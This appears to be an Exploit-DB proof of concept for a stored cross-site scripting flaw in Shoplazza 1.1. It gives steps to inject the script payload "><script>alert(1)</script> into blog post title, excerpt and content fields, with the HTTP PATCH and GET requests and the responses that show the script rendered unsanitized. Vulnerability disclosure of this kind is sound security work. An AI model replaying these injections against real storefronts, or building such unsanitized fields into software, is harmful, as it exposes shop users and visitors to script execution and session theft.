Shoplazza 1.1 – Stored Cross-Site Scripting (XSS)

  • Author: Andrey Stoykov
    Date: 2023-03-30
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/51150/
# Exploit Title: Shoplazza 1.1 - Stored Cross-Site Scripting (XSS)
# Exploit Author: Andrey Stoykov
# Software Link: https://github.com/Shoplazza/LifeStyle
# Version: 1.1
# Tested on: Ubuntu 20.04


Stored XSS #1:

To reproduce do the following:

1. Log in as a normal user account
2. Browse "Blog Posts" -> "Manage Blogs" -> "Add Blog Post"
3. Select "Title" and enter the payload "><script>alert(1)</script>


// HTTP PATCH request showing XSS payload

PATCH /admin/api/admin/articles/2dc688b1-ac9e-46d7-8e56-57ded1d45bf5 HTTP/1.1
Host: test1205.myshoplaza.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
[...]

{"article":{"id":"2dc688b1-ac9e-46d7-8e56-57ded1d45bf5","title":"Title\"><script>alert(1)</script>","excerpt":"Excerpt\"><script>alert(2)</script>","content":"<p>\"><script>alert(3)</script></p>"[...]


// HTTP response showing unsanitized XSS payload

HTTP/1.1 200 OK
Content-Type: application/json; charset=utf-8
[...]

{"article":{"title":"Title\"><script>alert(1)</script>","excerpt":"Excerpt\"><script>alert(2)</script>","published":true,"seo_title":"Title\"><script>alert(1)</script>"[...]


// HTTP GET request to trigger XSS payload

GET /blog/titlescriptalert1script?st=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJleHAiOjE2NzAzMzE5MzYsInN0b3JlX2lkIjo1MTA0NTksInVzZXJfaWQiOiI4NGY4Nzk4ZC03ZGQ1LTRlZGMtYjk3Yy02MWUwODk5ZjM2MDgifQ.9ybPJCtv6Lzf1BlDy-ipoGpXajtl75QdUKEnfj9L49I HTTP/1.1
Host: test1205.myshoplaza.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
[...]


// HTTP response showing unsanitized XSS payload

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
[...]

<meta name="viewport" content="width=device-width,initial-scale=1,minimum-scale=1,maximum-scale=1,user-scalable=no,viewport-fit=cover">
<title>Title"><script>alert(1)</script></title>
<meta name="keywords" content="test1205">
[...]